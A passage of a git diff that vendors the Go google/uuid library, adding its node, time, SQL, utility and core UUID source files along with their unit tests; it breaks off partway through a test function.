/dev/null +++ b/vendor/github.com/google/uuid/node.go @@ -0,0 +1,103 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "net" + "sync" +) + +var ( + nodeMu sync.Mutex + interfaces []net.Interface // cached list of interfaces + ifname string // name of interface being used + nodeID [6]byte // hardware for version 1 UUIDs + zeroID [6]byte // nodeID with only 0's +) + +// NodeInterface returns the name of the interface from which the NodeID was +// derived. The interface "user" is returned if the NodeID was set by +// SetNodeID. +func NodeInterface() string { + defer nodeMu.Unlock() + nodeMu.Lock() + return ifname +} + +// SetNodeInterface selects the hardware address to be used for Version 1 UUIDs. +// If name is "" then the first usable interface found will be used or a random +// Node ID will be generated. If a named interface cannot be found then false +// is returned. +// +// SetNodeInterface never fails when name is "". +func SetNodeInterface(name string) bool { + defer nodeMu.Unlock() + nodeMu.Lock() + return setNodeInterface(name) +} + +func setNodeInterface(name string) bool { + if interfaces == nil { + var err error + interfaces, err = net.Interfaces() + if err != nil && name != "" { + return false + } + } + + for _, ifs := range interfaces { + if len(ifs.HardwareAddr) >= 6 && (name == "" || name == ifs.Name) { + copy(nodeID[:], ifs.HardwareAddr) + ifname = ifs.Name + return true + } + } + + // We found no interfaces with a valid hardware address. If name + // does not specify a specific interface generate a random Node ID + // (section 4.1.6) + if name == "" { + randomBits(nodeID[:]) + return true + } + return false +} + +// NodeID returns a slice of a copy of the current Node ID, setting the Node ID +// if not already set. +func NodeID() []byte { + defer nodeMu.Unlock() + nodeMu.Lock() + if nodeID == zeroID { + setNodeInterface("") + } + nid := nodeID + return nid[:] +} + +// SetNodeID sets the Node ID to be used for Version 1 UUIDs. The first 6 bytes +// of id are used. If id is less than 6 bytes then false is returned and the +// Node ID is not set. +func SetNodeID(id []byte) bool { + if len(id) < 6 { + return false + } + defer nodeMu.Unlock() + nodeMu.Lock() + copy(nodeID[:], id) + ifname = "user" + return true +} + +// NodeID returns the 6 byte node id encoded in uuid. It returns nil if uuid is +// not valid. The NodeID is only well defined for version 1 and 2 UUIDs. +func (uuid UUID) NodeID() []byte { + if len(uuid) != 16 { + return nil + } + var node [6]byte + copy(node[:], uuid[10:]) + return node[:] +} diff --git a/vendor/github.com/google/uuid/seq_test.go b/vendor/github.com/google/uuid/seq_test.go new file mode 100644 index 0000000000..853a4aa3f3 --- /dev/null +++ b/vendor/github.com/google/uuid/seq_test.go @@ -0,0 +1,66 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "flag" + "runtime" + "testing" + "time" +) + +// This test is only run when --regressions is passed on the go test line. +var regressions = flag.Bool("regressions", false, "run uuid regression tests") + +// TestClockSeqRace tests for a particular race condition of returning two +// identical Version1 UUIDs. The duration of 1 minute was chosen as the race +// condition, before being fixed, nearly always occured in under 30 seconds. +func TestClockSeqRace(t *testing.T) { + if !*regressions { + t.Skip("skipping regression tests") + } + duration := time.Minute + + done := make(chan struct{}) + defer close(done) + + ch := make(chan UUID, 10000) + ncpu := runtime.NumCPU() + switch ncpu { + case 0, 1: + // We can't run the test effectively. + t.Skip("skipping race test, only one CPU detected") + return + default: + runtime.GOMAXPROCS(ncpu) + } + for i := 0; i < ncpu; i++ { + go func() { + for { + select { + case <-done: + return + case ch <- Must(NewUUID()): + } + } + }() + } + + uuids := make(map[string]bool) + cnt := 0 + start := time.Now() + for u := range ch { + s := u.String() + if uuids[s] { + t.Errorf("duplicate uuid after %d in %v: %s", cnt, time.Since(start), s) + return + } + uuids[s] = true + if time.Since(start) > duration { + return + } + cnt++ + } +} diff --git a/vendor/github.com/google/uuid/sql.go b/vendor/github.com/google/uuid/sql.go new file mode 100644 index 0000000000..528ad0de51 --- /dev/null +++ b/vendor/github.com/google/uuid/sql.go @@ -0,0 +1,58 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "database/sql/driver" + "fmt" +) + +// Scan implements sql.Scanner so UUIDs can be read from databases transparently +// Currently, database types that map to string and []byte are supported. Please +// consult database-specific driver documentation for matching types. +func (uuid *UUID) Scan(src interface{}) error { + switch src.(type) { + case string: + // if an empty UUID comes from a table, we return a null UUID + if src.(string) == "" { + return nil + } + + // see Parse for required string format + u, err := Parse(src.(string)) + + if err != nil { + return fmt.Errorf("Scan: %v", err) + } + + *uuid = u + case []byte: + b := src.([]byte) + + // if an empty UUID comes from a table, we return a null UUID + if len(b) == 0 { + return nil + } + + // assumes a simple slice of bytes if 16 bytes + // otherwise attempts to parse + if len(b) != 16 { + return uuid.Scan(string(b)) + } + copy((*uuid)[:], b) + + default: + return fmt.Errorf("Scan: unable to scan type %T into UUID", src) + } + + return nil +} + +// Value implements sql.Valuer so that UUIDs can be written to databases +// transparently. Currently, UUIDs map to strings. Please consult +// database-specific driver documentation for matching types. +func (uuid UUID) Value() (driver.Value, error) { + return uuid.String(), nil +} diff --git a/vendor/github.com/google/uuid/sql_test.go b/vendor/github.com/google/uuid/sql_test.go new file mode 100644 index 0000000000..c193196037 --- /dev/null +++ b/vendor/github.com/google/uuid/sql_test.go @@ -0,0 +1,102 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "strings" + "testing" +) + +func TestScan(t *testing.T) { + var stringTest string = "f47ac10b-58cc-0372-8567-0e02b2c3d479" + var badTypeTest int = 6 + var invalidTest string = "f47ac10b-58cc-0372-8567-0e02b2c3d4" + + byteTest := make([]byte, 16) + byteTestUUID := Must(Parse(stringTest)) + copy(byteTest, byteTestUUID[:]) + + // sunny day tests + + var uuid UUID + err := (&uuid).Scan(stringTest) + if err != nil { + t.Fatal(err) + } + + err = (&uuid).Scan([]byte(stringTest)) + if err != nil { + t.Fatal(err) + } + + err = (&uuid).Scan(byteTest) + if err != nil { + t.Fatal(err) + } + + // bad type tests + + err = (&uuid).Scan(badTypeTest) + if err == nil { + t.Error("int correctly parsed and shouldn't have") + } + if !strings.Contains(err.Error(), "unable to scan type") { + t.Error("attempting to parse an int returned an incorrect error message") + } + + // invalid/incomplete uuids + + err = (&uuid).Scan(invalidTest) + if err == nil { + t.Error("invalid uuid was parsed without error") + } + if !strings.Contains(err.Error(), "invalid UUID") { + t.Error("attempting to parse an invalid UUID returned an incorrect error message") + } + + err = (&uuid).Scan(byteTest[:len(byteTest)-2]) + if err == nil { + t.Error("invalid byte uuid was parsed without error") + } + if !strings.Contains(err.Error(), "invalid UUID") { + t.Error("attempting to parse an invalid byte UUID returned an incorrect error message") + } + + // empty tests + + uuid = UUID{} + var emptySlice []byte + err = (&uuid).Scan(emptySlice) + if err != nil { + t.Fatal(err) + } + + for _, v := range uuid { + if v != 0 { + t.Error("UUID was not nil after scanning empty byte slice") + } + } + + uuid = UUID{} + var emptyString string + err = (&uuid).Scan(emptyString) + if err != nil { + t.Fatal(err) + } + for _, v := range uuid { + if v != 0 { + t.Error("UUID was not nil after scanning empty byte slice") + } + } +} + +func TestValue(t *testing.T) { + stringTest := "f47ac10b-58cc-0372-8567-0e02b2c3d479" + uuid := Must(Parse(stringTest)) + val, _ := uuid.Value() + if val != stringTest { + t.Error("Value() did not return expected string") + } +} diff --git a/vendor/github.com/google/uuid/time.go b/vendor/github.com/google/uuid/time.go new file mode 100644 index 0000000000..fd7fe0ac46 --- /dev/null +++ b/vendor/github.com/google/uuid/time.go @@ -0,0 +1,123 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "encoding/binary" + "sync" + "time" +) + +// A Time represents a time as the number of 100's of nanoseconds since 15 Oct +// 1582. +type Time int64 + +const ( + lillian = 2299160 // Julian day of 15 Oct 1582 + unix = 2440587 // Julian day of 1 Jan 1970 + epoch = unix - lillian // Days between epochs + g1582 = epoch * 86400 // seconds between epochs + g1582ns100 = g1582 * 10000000 // 100s of a nanoseconds between epochs +) + +var ( + timeMu sync.Mutex + lasttime uint64 // last time we returned + clockSeq uint16 // clock sequence for this run + + timeNow = time.Now // for testing +) + +// UnixTime converts t the number of seconds and nanoseconds using the Unix +// epoch of 1 Jan 1970. +func (t Time) UnixTime() (sec, nsec int64) { + sec = int64(t - g1582ns100) + nsec = (sec % 10000000) * 100 + sec /= 10000000 + return sec, nsec +} + +// GetTime returns the current Time (100s of nanoseconds since 15 Oct 1582) and +// clock sequence as well as adjusting the clock sequence as needed. An error +// is returned if the current time cannot be determined. +func GetTime() (Time, uint16, error) { + defer timeMu.Unlock() + timeMu.Lock() + return getTime() +} + +func getTime() (Time, uint16, error) { + t := timeNow() + + // If we don't have a clock sequence already, set one. + if clockSeq == 0 { + setClockSequence(-1) + } + now := uint64(t.UnixNano()/100) + g1582ns100 + + // If time has gone backwards with this clock sequence then we + // increment the clock sequence + if now <= lasttime { + clockSeq = ((clockSeq + 1) & 0x3fff) | 0x8000 + } + lasttime = now + return Time(now), clockSeq, nil +} + +// ClockSequence returns the current clock sequence, generating one if not +// already set. The clock sequence is only used for Version 1 UUIDs. +// +// The uuid package does not use global static storage for the clock sequence or +// the last time a UUID was generated. Unless SetClockSequence is used, a new +// random clock sequence is generated the first time a clock sequence is +// requested by ClockSequence, GetTime, or NewUUID. (section 4.2.1.1) +func ClockSequence() int { + defer timeMu.Unlock() + timeMu.Lock() + return clockSequence() +} + +func clockSequence() int { + if clockSeq == 0 { + setClockSequence(-1) + } + return int(clockSeq & 0x3fff) +} + +// SetClockSeq sets the clock sequence to the lower 14 bits of seq. Setting to +// -1 causes a new sequence to be generated. +func SetClockSequence(seq int) { + defer timeMu.Unlock() + timeMu.Lock() + setClockSequence(seq) +} + +func setClockSequence(seq int) { + if seq == -1 { + var b [2]byte + randomBits(b[:]) // clock sequence + seq = int(b[0])<<8 | int(b[1]) + } + old_seq := clockSeq + clockSeq = uint16(seq&0x3fff) | 0x8000 // Set our variant + if old_seq != clockSeq { + lasttime = 0 + } +} + +// Time returns the time in 100s of nanoseconds since 15 Oct 1582 encoded in +// uuid. The time is only defined for version 1 and 2 UUIDs. +func (uuid UUID) Time() Time { + time := int64(binary.BigEndian.Uint32(uuid[0:4])) + time |= int64(binary.BigEndian.Uint16(uuid[4:6])) << 32 + time |= int64(binary.BigEndian.Uint16(uuid[6:8])&0xfff) << 48 + return Time(time) +} + +// ClockSequence returns the clock sequence encoded in uuid. +// The clock sequence is only well defined for version 1 and 2 UUIDs. +func (uuid UUID) ClockSequence() int { + return int(binary.BigEndian.Uint16(uuid[8:10])) & 0x3fff +} diff --git a/vendor/github.com/google/uuid/util.go b/vendor/github.com/google/uuid/util.go new file mode 100644 index 0000000000..5ea6c73780 --- /dev/null +++ b/vendor/github.com/google/uuid/util.go @@ -0,0 +1,43 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "io" +) + +// randomBits completely fills slice b with random data. +func randomBits(b []byte) { + if _, err := io.ReadFull(rander, b); err != nil { + panic(err.Error()) // rand should never fail + } +} + +// xvalues returns the value of a byte as a hexadecimal digit or 255. +var xvalues = [256]byte{ + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 255, 255, 255, 255, 255, 255, + 255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 10, 11, 12, 13, 14, 15, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, + 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, +} + +// xtob converts hex characters x1 and x2 into a byte. +func xtob(x1, x2 byte) (byte, bool) { + b1 := xvalues[x1] + b2 := xvalues[x2] + return (b1 << 4) | b2, b1 != 255 && b2 != 255 +} diff --git a/vendor/github.com/google/uuid/uuid.go b/vendor/github.com/google/uuid/uuid.go new file mode 100644 index 0000000000..b7b9ced315 --- /dev/null +++ b/vendor/github.com/google/uuid/uuid.go @@ -0,0 +1,191 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "bytes" + "crypto/rand" + "encoding/hex" + "errors" + "fmt" + "io" + "strings" +) + +// A UUID is a 128 bit (16 byte) Universal Unique IDentifier as defined in RFC +// 4122. +type UUID [16]byte + +// A Version represents a UUID's version. +type Version byte + +// A Variant represents a UUID's variant. +type Variant byte + +// Constants returned by Variant. +const ( + Invalid = Variant(iota) // Invalid UUID + RFC4122 // The variant specified in RFC4122 + Reserved // Reserved, NCS backward compatibility. + Microsoft // Reserved, Microsoft Corporation backward compatibility. + Future // Reserved for future definition. +) + +var rander = rand.Reader // random function + +// Parse decodes s into a UUID or returns an error. Both the UUID form of +// xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx and +// urn:uuid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx are decoded. +func Parse(s string) (UUID, error) { + var uuid UUID + if len(s) != 36 { + if len(s) != 36+9 { + return uuid, fmt.Errorf("invalid UUID length: %d", len(s)) + } + if strings.ToLower(s[:9]) != "urn:uuid:" { + return uuid, fmt.Errorf("invalid urn prefix: %q", s[:9]) + } + s = s[9:] + } + if s[8] != '-' || s[13] != '-' || s[18] != '-' || s[23] != '-' { + return uuid, errors.New("invalid UUID format") + } + for i, x := range [16]int{ + 0, 2, 4, 6, + 9, 11, + 14, 16, + 19, 21, + 24, 26, 28, 30, 32, 34} { + if v, ok := xtob(s[x], s[x+1]); !ok { + return uuid, errors.New("invalid UUID format") + } else { + uuid[i] = v + } + } + return uuid, nil +} + +// ParseBytes is like Parse, except it parses a byte slice instead of a string. +func ParseBytes(b []byte) (UUID, error) { + var uuid UUID + if len(b) != 36 { + if len(b) != 36+9 { + return uuid, fmt.Errorf("invalid UUID length: %d", len(b)) + } + if !bytes.Equal(bytes.ToLower(b[:9]), []byte("urn:uuid:")) { + return uuid, fmt.Errorf("invalid urn prefix: %q", b[:9]) + } + b = b[9:] + } + if b[8] != '-' || b[13] != '-' || b[18] != '-' || b[23] != '-' { + return uuid, errors.New("invalid UUID format") + } + for i, x := range [16]int{ + 0, 2, 4, 6, + 9, 11, + 14, 16, + 19, 21, + 24, 26, 28, 30, 32, 34} { + if v, ok := xtob(b[x], b[x+1]); !ok { + return uuid, errors.New("invalid UUID format") + } else { + uuid[i] = v + } + } + return uuid, nil +} + +// Must returns uuid if err is nil and panics otherwise. +func Must(uuid UUID, err error) UUID { + if err != nil { + panic(err) + } + return uuid +} + +// String returns the string form of uuid, xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx +// , or "" if uuid is invalid. +func (uuid UUID) String() string { + var buf [36]byte + encodeHex(buf[:], uuid) + return string(buf[:]) +} + +// URN returns the RFC 2141 URN form of uuid, +// urn:uuid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx, or "" if uuid is invalid. +func (uuid UUID) URN() string { + var buf [36 + 9]byte + copy(buf[:], "urn:uuid:") + encodeHex(buf[9:], uuid) + return string(buf[:]) +} + +func encodeHex(dst []byte, uuid UUID) { + hex.Encode(dst[:], uuid[:4]) + dst[8] = '-' + hex.Encode(dst[9:13], uuid[4:6]) + dst[13] = '-' + hex.Encode(dst[14:18], uuid[6:8]) + dst[18] = '-' + hex.Encode(dst[19:23], uuid[8:10]) + dst[23] = '-' + hex.Encode(dst[24:], uuid[10:]) +} + +// Variant returns the variant encoded in uuid. +func (uuid UUID) Variant() Variant { + switch { + case (uuid[8] & 0xc0) == 0x80: + return RFC4122 + case (uuid[8] & 0xe0) == 0xc0: + return Microsoft + case (uuid[8] & 0xe0) == 0xe0: + return Future + default: + return Reserved + } +} + +// Version returns the version of uuid. +func (uuid UUID) Version() Version { + return Version(uuid[6] >> 4) +} + +func (v Version) String() string { + if v > 15 { + return fmt.Sprintf("BAD_VERSION_%d", v) + } + return fmt.Sprintf("VERSION_%d", v) +} + +func (v Variant) String() string { + switch v { + case RFC4122: + return "RFC4122" + case Reserved: + return "Reserved" + case Microsoft: + return "Microsoft" + case Future: + return "Future" + case Invalid: + return "Invalid" + } + return fmt.Sprintf("BadVariant%d", int(v)) +} + +// SetRand sets the random number generator to r, which implents io.Reader. +// If r.Read returns an error when the package requests random data then +// a panic will be issued. +// +// Calling SetRand with nil sets the random number generator to the default +// generator. +func SetRand(r io.Reader) { + if r == nil { + rander = rand.Reader + return + } + rander = r +} diff --git a/vendor/github.com/google/uuid/uuid_test.go b/vendor/github.com/google/uuid/uuid_test.go new file mode 100644 index 0000000000..70986ff3f3 --- /dev/null +++ b/vendor/github.com/google/uuid/uuid_test.go @@ -0,0 +1,526 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "bytes" + "fmt" + "os" + "strings" + "testing" + "time" + "unsafe" +) + +type test struct { + in string + version Version + variant Variant + isuuid bool +} + +var tests = []test{ + {"f47ac10b-58cc-0372-8567-0e02b2c3d479", 0, RFC4122, true}, + {"f47ac10b-58cc-1372-8567-0e02b2c3d479", 1, RFC4122, true}, + {"f47ac10b-58cc-2372-8567-0e02b2c3d479", 2, RFC4122, true}, + {"f47ac10b-58cc-3372-8567-0e02b2c3d479", 3, RFC4122, true}, + {"f47ac10b-58cc-4372-8567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-5372-8567-0e02b2c3d479", 5, RFC4122, true}, + {"f47ac10b-58cc-6372-8567-0e02b2c3d479", 6, RFC4122, true}, + {"f47ac10b-58cc-7372-8567-0e02b2c3d479", 7, RFC4122, true}, + {"f47ac10b-58cc-8372-8567-0e02b2c3d479", 8, RFC4122, true}, + {"f47ac10b-58cc-9372-8567-0e02b2c3d479", 9, RFC4122, true}, + {"f47ac10b-58cc-a372-8567-0e02b2c3d479", 10, RFC4122, true}, + {"f47ac10b-58cc-b372-8567-0e02b2c3d479", 11, RFC4122, true}, + {"f47ac10b-58cc-c372-8567-0e02b2c3d479", 12, RFC4122, true}, + {"f47ac10b-58cc-d372-8567-0e02b2c3d479", 13, RFC4122, true}, + {"f47ac10b-58cc-e372-8567-0e02b2c3d479", 14, RFC4122, true}, + {"f47ac10b-58cc-f372-8567-0e02b2c3d479", 15, RFC4122, true}, + + {"urn:uuid:f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true}, + {"URN:UUID:f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-1567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-2567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-3567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-4567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-5567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-6567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-7567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-8567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-4372-9567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-4372-a567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-4372-b567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-4372-c567-0e02b2c3d479", 4, Microsoft, true}, + {"f47ac10b-58cc-4372-d567-0e02b2c3d479", 4, Microsoft, true}, + {"f47ac10b-58cc-4372-e567-0e02b2c3d479", 4, Future, true}, + {"f47ac10b-58cc-4372-f567-0e02b2c3d479", 4, Future, true}, + + {"f47ac10b158cc-5372-a567-0e02b2c3d479", 0, Invalid, false}, + {"f47ac10b-58cc25372-a567-0e02b2c3d479", 0, Invalid, false}, + {"f47ac10b-58cc-53723a567-0e02b2c3d479", 0, Invalid, false}, + {"f47ac10b-58cc-5372-a56740e02b2c3d479", 0, Invalid, false}, + {"f47ac10b-58cc-5372-a567-0e02-2c3d479", 0, Invalid, false}, + {"g47ac10b-58cc-4372-a567-0e02b2c3d479", 0, Invalid, false}, +} + +var constants = []struct { + c interface{} + name string +}{ + {Person, "Person"}, + {Group, "Group"}, + {Org, "Org"}, + {Invalid, "Invalid"}, + {RFC4122, "RFC4122"}, + {Reserved, "Reserved"}, + {Microsoft, "Microsoft"}, + {Future, "Future"}, + {Domain(17), "Domain17"}, + {Variant(42), "BadVariant42"}, +} + +func testTest(t *testing.T, in string, tt test) { + uuid, err := Parse(in) + if ok := (err == nil); ok != tt.isuuid { + t.Errorf("Parse(%s) got %v expected %v\b", in, ok, tt.isuuid) + } + if err != nil { + return + } + + if v := uuid.Variant(); v != tt.variant { + t.Errorf("Variant(%s) got %d expected %d\b", in, v, tt.variant) + } + if v := uuid.Version(); v != tt.version { + t.Errorf("Version(%s) got %d expected %d\b", in, v, tt.version) + } +} + +func testBytes(t *testing.T, in []byte, tt test) { + uuid, err := ParseBytes(in) + if ok := (err == nil); ok != tt.isuuid { + t.Errorf("ParseBytes(%s) got %v expected %v\b", in, ok, tt.isuuid) + } + if err != nil { + return + } + suuid, _ := Parse(string(in)) + if uuid != suuid { + t.Errorf("ParseBytes(%s) got %v expected %v\b", in, uuid, suuid) + } +} + +func TestUUID(t *testing.T) { + for _, tt := range tests { + testTest(t, tt.in, tt) + testTest(t, strings.ToUpper(tt.in), tt) + testBytes(t, []byte(tt.in), tt) + } +} + +func TestConstants(t *testing.T) { + for x, tt := range constants { + v, ok := tt.c.(fmt.Stringer) + if !ok { + t.Errorf("%x: %v: not a stringer", x, v) + } else if s := v.String(); s != tt.name { + v, _ := tt.c.(int) + t.Errorf("%x: Constant %T:%d gives %q, expected %q", x, tt.c, v, s, tt.name) + } + } +} + +func TestRandomUUID(t *testing.T) { + m := make(map[string]bool) + for x := 1; x < 32; x++ { + uuid := New() + s := uuid.String() + if m[s] { + t.Errorf("NewRandom returned duplicated UUID %s", s) + } + m[s] = true + if v := uuid.Version(); v != 4 { + t.Errorf("Random UUID of version %s", v) + } + if uuid.Variant() != RFC4122 { + t.Errorf("Random UUID is variant %d", uuid.Variant()) + } + } +} + +func TestNew(t *testing.T) { + m := make(map[UUID]bool) + for x := 1; x < 32; x++ { + s := New() + if m[s] { + t.Errorf("New returned duplicated UUID %s", s) + } + m[s] = true + uuid, err := Parse(s.String()) + if err != nil { + t.Errorf("New.String() returned %q which does not decode", s) + continue + } + if v := uuid.Version(); v != 4 { + t.Errorf("Random UUID of version %s", v) + } + if uuid.Variant() != RFC4122 { + t.Errorf("Random UUID is variant %d", uuid.Variant()) + } + } +} + +func TestClockSeq(t *testing.T) { + // Fake time.Now for this test to return a monotonically advancing time; restore it at end. + defer func(orig func() time.Time) { timeNow = orig }(timeNow) + monTime := time.Now() + timeNow = func() time.Time { + monTime = monTime.Add(1 * time.Second) + return monTime + } + + SetClockSequence(-1) + uuid1, err := NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + uuid2, err := NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + + if s1, s2 := uuid1.ClockSequence(), uuid2.ClockSequence(); s1 != s2 { + t.Errorf("clock sequence %d != %d", s1, s2) + } + + SetClockSequence(-1) + uuid2, err = NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + + // Just on the very off chance we generated the same sequence + // two times we try again. + if uuid1.ClockSequence() == uuid2.ClockSequence() { + SetClockSequence(-1) + uuid2, err = NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + } + if s1, s2 := uuid1.ClockSequence(), uuid2.ClockSequence(); s1 == s2 { + t.Errorf("Duplicate clock sequence %d", s1) + } + + SetClockSequence(0x1234) + uuid1, err = NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + if seq := uuid1.ClockSequence(); seq != 0x1234 { + t.Errorf("%s: expected seq 0x1234 got 0x%04x", uuid1, seq) + } +} + +func TestCoding(t *testing.T) { + text := "7d444840-9dc0-11d1-b245-5ffdce74fad2" + urn := "urn:uuid:7d444840-9dc0-11d1-b245-5ffdce74fad2" + data := UUID{ + 0x7d, 0x44, 0x48, 0x40, + 0x9d, 0xc0, + 0x11, 0xd1, + 0xb2, 0x45, + 0x5f, 0xfd, 0xce, 0x74, 0xfa, 0xd2, + } + if v := data.String(); v != text { + t.Errorf("%x: encoded to %s, expected %s", data, v, text) + } + if v := data.URN(); v != urn { + t.Errorf("%x: urn is %s, expected %s", data, v, urn) + } + + uuid, err := Parse(text) + if err != nil { + t.Errorf("Parse returned unexpected error %v", err) + } + if data != data { + t.Errorf("%s: decoded to %s, expected %s", text, uuid, data) + } +} + +func TestVersion1(t *testing.T) { + uuid1, err := NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + uuid2, err := NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + + if uuid1 == uuid2 { + t.Errorf("%s:duplicate uuid", uuid1) + } + if v := uuid1.Version(); v != 1 { + t.Errorf("%s: version %s expected 1", uuid1, v) + } + if v := uuid2.Version(); v != 1 { + t.Errorf("%s: version %s expected 1", uuid2, v) + } + n1 := uuid1.NodeID() + n2 := uuid2.NodeID() + if !bytes.Equal(n1, n2) { + t.Errorf("Different nodes %x != %x", n1, n2) + } + t1 := uuid1.Time() + t2 := uuid2.Time() + q1 := uuid1.ClockSequence() + q2 := uuid2.ClockSequence() + + switch { + case t1 == t2 && q1 == q2: + t.Error("time stopped") + case t1 > t2 && q1 == q2: + t.Error("time reversed") + case t1 < t2 && q1 != q2: + t.Error("clock sequence chaned unexpectedly") + } +} + +func TestNode(t *testing.T) { + // This test is mostly to make sure we don't leave nodeMu locked. + ifname = "" + if ni := NodeInterface(); ni != "" { + t.Errorf("NodeInterface got %q, want %q", ni, "") + } + if SetNodeInterface("xyzzy") { + t.Error("SetNodeInterface succeeded on a bad interface name") + } + if !SetNodeInterface("") { + t.Error("SetNodeInterface failed") + } + if ni := NodeInterface(); ni == "" { + t.Error("NodeInterface returned an empty string") + } + + ni := NodeID() + if len(ni) != 6 { + t.Errorf("ni got %d bytes, want 6", len(ni)) + } + hasData := false + for _, b := range ni { + if b != 0 { + hasData = true + } + } + if !hasData { + t.Error("nodeid is all zeros") + } + + id := []byte{1, 2, 3, 4, 5, 6, 7, 8} + SetNodeID(id) + ni = NodeID() + if !bytes.Equal(ni, id[:6]) { + t.Errorf("got nodeid %v, want %v", ni, id[:6]) + } + + if ni := NodeInterface(); ni != "user" { + t.Errorf("got inteface %q, want %q", ni, "user") + } +} + +func TestNodeAndTime(t *testing.T) { + // Time is February 5, 1998 12:30:23.136364800 AM GMT + + uuid, err := Parse("7d444840-9dc0-11d1-b245-5ffdce74fad2") + if err != nil { + t.Fatalf("Parser returned unexpected error %v", err) + } + node := []byte{0x5f, 0xfd, 0xce, 0x74, 0xfa, 0xd2} + + ts := uuid.Time() + c := time.Unix(ts.UnixTime()) + want := time.Date(1998, 2, 5, 0, 30, 23, 136364800, time.UTC) + if !c.Equal(want) { + t.Errorf("Got time %v, want %v", c, want) + } + if !bytes.Equal(node, uuid.NodeID()) { + t.Errorf("Expected node %v got %v", node, uuid.NodeID()) + } +} + +func TestMD5(t *testing.T) { + uuid := NewMD5(NameSpaceDNS, []byte("python.org")).String() + want := "6fa459ea-ee8a-3ca4-894e-db77e160355e" + if uuid != want { + t.Errorf("MD5: got %q expected %q", uuid, want) + } +} + +func TestSHA1(t *testing.T) { + uuid := NewSHA1(NameSpaceDNS, []byte("python.org")).String() + want := "886313e1-3b8a-5372-9b90-0c9aee199e5d" + if uuid != want { + t.Errorf("SHA1: got %q expected %q", uuid, want) + } +} + +func TestNodeID(t *testing.T) { + nid := []byte{1, 2, 3, 4, 5, 6} + SetNodeInterface("") + s := NodeInterface() + if s == "" || s == "user" { + t.Errorf("NodeInterface %q after SetInteface", s) + } + node1 := NodeID() + if node1 == nil { + t.Error("NodeID nil after SetNodeInterface", s) + } + SetNodeID(nid) + s = NodeInterface() + if s != "user" { + t.Errorf("Expected NodeInterface %q got %q", "user", s) + } + node2 := NodeID() + if node2 == nil { + t.Error("NodeID nil after SetNodeID", s) + } + if bytes.Equal(node1, node2) { + t.Error("NodeID not changed after SetNodeID", s) + } else if 